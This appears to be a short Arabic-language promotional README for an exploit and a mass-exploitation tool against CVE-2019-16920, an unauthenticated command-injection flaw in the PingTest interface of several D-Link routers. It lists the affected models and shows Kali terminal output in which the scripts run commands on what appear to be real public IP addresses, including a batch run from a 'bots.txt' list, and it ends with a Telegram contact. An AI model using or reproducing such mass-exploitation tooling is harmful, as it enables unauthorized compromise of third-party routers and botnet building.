
Exploit and Mass Pwn3r لـ CVE-2019-16920
تم العثور على الثغرة في أحدث البرامج الثابتة لمنتجات D-Link التالية: DIR-655 DIR-866L DIR-652 DHP-1565
يحدث تنفيذ التعليمات البرمجية عن بُعد دون مصادقة في منتجات D-Link مثل DIR-655C وDIR-866L وDIR-652 وDHP-1565. تحدث المشكلة عندما يرسل المهاجم إدخالًا عشوائيًا إلى واجهة البوابة المشتركة لجهاز "PingTest" مما قد يؤدي إلى حقن أوامر. يمكن للمهاجم الذي ينجح في تشغيل حقن الأوامر أن يحقق اختراقًا كاملاً للنظام. لاحقًا، تم اكتشاف بشكل مستقل أن هذه الأجهزة متأثرة أيضًا: DIR-855L وDAP-1533 وDIR-862L وDIR-615 وDIR-835 وDIR-825.
root@kali:~# python3 CVE-2019-16920.py 195.208.166.41 8081 ls
[*]Sending payload
[*]Exploited!
root@kali:~#
root@kali:~# python3 CVE-2019-16920-MassPwn3r.py bots.txt 8081 id
[*]Exploiting: 195.208.166.41
[!]Unable to connect to host
[!]Unable to connect to host
[*]Exploiting: 83.243.166.37
[*]Exploiting: 74.95.133.33
[*]Exploiting: 97.89.64.118
[*]Exploiting: 66.162.68.154
[!]Unable to connect to host
[*]Exploiting: 72.47.152.161
[*]Exploiting: 97.93.250.209
[*]Exploiting: 183.207.196.64
root@kali:~#
Telegram:@eth_hacker0x18